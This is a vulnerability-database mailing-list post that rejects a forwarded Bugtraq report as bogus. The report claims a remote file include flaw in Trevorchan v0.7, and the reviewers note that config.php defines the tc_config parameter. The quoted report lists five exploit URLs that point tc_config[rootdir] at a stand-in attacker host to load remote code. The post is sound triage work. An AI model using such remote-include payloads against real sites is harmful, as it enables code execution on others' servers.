[VIM] [Bogus] [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File Include Vulnerability] (fwd)

[rkeith at securityfocus.com]

The tc_config parameter is clearly defined in the config.php; file which 
is called at the beginning of every script.

---------- Forwarded message ----------
Date: Sat, 13 Jan 2007 10:00:46 -0700
From: Teo Adams <tadams at securityfocus.com>
Subject: [Bogus] V [ilkerkandemir at mynet.com: Trevorchan <= v0.7 Remote File
     Include Vulnerability]

All of these scripts include a config file that sanitizes the reported 
parameter.

> ----- Forwarded message from ilkerkandemir at mynet.com -----
> 
> From: ilkerkandemir at mynet.com
> Subject: Trevorchan <= v0.7 Remote File Include Vulnerability
> To: bugtraq at securityfocus.com
> Date: 13 Jan 2007 11:33:28 -0000
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> Message-ID: <20070113113328.6236.qmail at securityfocus.com>
>
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> AYYILDIZ.ORG PreSents...
> 
> 
> 
> Script:Trevorchan v0.7
> Download: http://rel.trevorchan.org/Releasev07.zip
> 
> Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
> 
> 
> 
> Code:
> require_once($tc_config['rootdir']."/inc/functions.php");
> require_once($tc_config['rootdir']."/inc/encryption.php");
>
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> Exploit: upgrade.php?tc_config[rootdir]=http://attacker.txt?
> paint_save.php?tc_config[rootdir]=http://attacker.txt? 
> menu.php?tc_config[rootdir]=http://attacker.txt?
> manage.php?tc_config[rootdir]=http://attacker.txt?
> banned.php?tc_config[rootdir]=http://attacker.txt?
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
> Special Tnx: AYYILDIZ.ORG
> 
> ----- End forwarded message -----
>

--
Rob Keith
Symantec